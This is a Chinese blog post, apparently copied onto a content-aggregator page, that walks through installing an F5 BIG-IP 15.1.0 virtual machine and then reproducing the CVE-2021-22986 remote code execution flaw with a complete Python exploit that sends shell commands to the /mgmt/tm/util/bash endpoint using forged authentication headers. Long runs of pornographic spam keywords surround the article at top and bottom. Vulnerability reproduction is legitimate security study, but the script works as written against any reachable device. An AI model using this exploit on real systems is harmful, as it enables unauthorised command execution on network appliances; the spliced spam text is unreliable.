日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

F5 BIG-IP 远程代码执行漏洞 CVE-2021-22986 虚拟机上复现

發布時間:2025/4/5 编程问答 27 豆豆
生活随笔 收集整理的這篇文章主要介紹了 F5 BIG-IP 远程代码执行漏洞 CVE-2021-22986 虚拟机上复现 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

一、在vmware上安裝BIGIP-15.1.0

進入F5官方主頁:https://support.f5.com/csp/home
點擊下載按鈕(如下圖所示)

進入頁面后,我們選擇v15.X版本

選擇15.1.0長期維護版本

在這里,我們選擇虛擬化版本

點擊我接受按鈕

選擇第一個下載

下載完成之后,我們將下載下來的ova文件拖動到虛擬機當中,即可完成虛擬機的安裝

二、BIGIP虛擬機的初始使用

虛擬機登陸
虛擬機裝好后 默認的用戶名是 root,密碼是default.
個別用戶登陸后,會強制要求更換密碼。這里更換的密碼不能是一些常用的字符組合(比如單詞)否則很容易不通過。如果您失敗了幾次,不妨嘗試類似于f8fa7g4k3k69o這樣的密碼。
遠程web登陸
虛擬機root登陸成功后,通過ifconfig命令獲取ip地址(虛擬機要橋接模式哦),假設這里獲取的ip為10.0.0.166, 那么在host主機訪問這個網址,進入web配置頁面


web遠程登陸的用戶名和密碼都是admin,但是我在登陸的時候密碼始終不對,最后,我只好重置這個密碼(如下圖,輸入兩遍新密碼)

終于,在重置密碼后,我web遠程登陸成功了

license激活
接下來,我們點擊license按鈕(我這里是激活過的)

如果不是已激活的狀態,需要進入官網:(http://www.f5.com/trial)來獲取激活碼
流程如圖所示,選擇紅色框框選中的按鈕

點擊Get started按鈕

填寫你的申請信息(官網要登陸哦)

稍后,會在半個小時內,將激活碼發送到您的郵箱里面(郵箱是官網賬號注冊時留的郵箱)
我們收到激活碼后填寫到下面的Base Registration Key欄中,然后選擇Automatic模式進行激活(因為本人激活過了,所以下圖是在網上找的,網上的那個人選擇的是第二個,這里我實際操作選擇的是第一個)

然后點擊Next按鈕,如果出現下一步或者我接受之類的按鈕一律點擊即可
之后一般會自動跳轉到如下圖所示的界面,這就代表激活成功了

三、遠程代碼執行命令

執行代碼

import requests import json from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning)def attack(target_url, command="pwd"):command = f"\'{command}\'"check_url = target_url + '/mgmt/tm/util/bash'headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36",'Content-Type': 'application/json','X-F5-Auth-Token': '','Authorization': 'Basic YWRtaW46QVNhc1M='}data = {'command': "run",'utilCmdArgs':f"-c {command}"}try:response = requests.post(url=check_url, json=data, headers=headers, verify=False, timeout=5)if response.status_code == 200 and 'commandResult' in response.text:print(" {} 存在漏洞".format(target_url))attack_result = json.loads(response.text.replace('\\n', '\\t')).get('commandResult', None)return attack_resultelse:print("{} 不存在漏洞".format(target_url))except Exception as e:print('url 訪問異常 {}'.format(target_url))def format_url(url):try:if url[:4] != "http":url = "https://" + urlurl = url.strip()return urlexcept Exception as e:print('URL 錯誤 {}'.format(url))if __name__ == '__main__':# 你的虛擬機ip地址ip = "your ip"# 執行的命令command = "ls"url = format_url(ip)# 輸出返回結果print(attack(url, command)) 上面的代碼用戶使用的時候,只需要將ip 改成您虛擬機的ip即可,其余無需改變

執行結果展示

  • 查看當前路徑
  • 查看當前路徑下的文件

    3.創建一個目錄

    到虛擬機中,我們查看目錄是否創建成功

  • 可以看到目錄創建成功

    總結

    以上是生活随笔為你收集整理的F5 BIG-IP 远程代码执行漏洞 CVE-2021-22986 虚拟机上复现的全部內容,希望文章能夠幫你解決所遇到的問題。

    如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。

    主站蜘蛛池模板: 国产91美女视频 | 亚洲五码在线 | 精品国产aⅴ一区二区三区东京热 | 国产小毛片 | 动漫一区二区三区 | 免费在线观看黄色片 | 我要看免费黄色片 | 伊人春色av | 国产精品高潮av | 亚洲一区二区三区在线看 | 影音先锋男人资源网站 | 永久黄网站色视频免费观看w | 亚洲色图另类 | 色播基地 | 欧美一性一乱一交一视频 | 国产精品第5页 | 国产香蕉一区二区三区 | 日韩经典第一页 | 精品无码在线视频 | 色呦呦麻豆 | 日本xxxxxxxxx69| 午夜涩涩| 在线观看免费www | jizz日本少妇 | 日韩七区 | www.av72| 青青青青青操 | 99久久亚洲精品日本无码 | 美女被娇喘视频 | 性感美女被爆操 | 黄色国产一级片 | 一区久久| 在线视频 91 | 亚洲精品国产精品国自产 | 黄色成人在线网站 | 日批视频免费观看 | 欧美日韩在线观看一区二区三区 | 激情片| 日xxxx| 欧美一区在线看 | 特黄a级片 | 久久精品国产亚洲AV无码麻豆 | 亚洲av无码国产在丝袜线观看 | 免看一级a毛片一片成人不卡 | 男男上床视频 | 国产免费午夜 | 热久久精品免费视频 | 中文字幕日韩久久 | 国产在线麻豆精品观看 | 欧美成人免费网站 | 国产成人精品在线观看 | 国产激情视频网站 | 日本一区二区三区四区在线观看 | gai视频在线观看资源 | 免费在线观看一区 | 俄罗斯女人裸体性做爰 | 久久精品国产99国产精品 | 国产又爽又黄免费软件 | 超碰午夜 | 都市激情麻豆 | 激情久久久久久 | 日韩精品人妻一区二区三区免费 | 久久y| 日韩一二区 | 乱亲女h秽乱长久久久 | 国产99久久久久 | 久久久久国产精品区片区无码 | 亚洲理论片在线观看 | 欧洲精品久久一区二区 | 黄色a区 | 毛片无限看 | 成人国产在线视频 | 国产无遮无挡120秒 欧美综合图片 | www.香蕉视频在线观看 | 中文字幕日韩专区 | 一级片久久| 国产97色在线 | 国产 | 色射视频 | 欧美特黄一级视频 | 免费黄色片子 | 亚洲aⅴ在线 | 99热这里只有精品3 成年人黄色网址 | 男女互插视频 | 亚洲三区视频 | 日韩在线三区 | 亚洲欧美精品一区二区三区 | 91欧美精品| 日韩免费av一区 | 免费成人美女女 | 天堂av网址 | 涩涩视频网址 | 国产美女精品一区二区三区 | 黄色网页在线 | 男同精品| 韩国电影一区 | 成人午夜视频精品一区 | 狼人久久| 国产性一乱一性一伧一色 | 亚洲欧美天堂网 |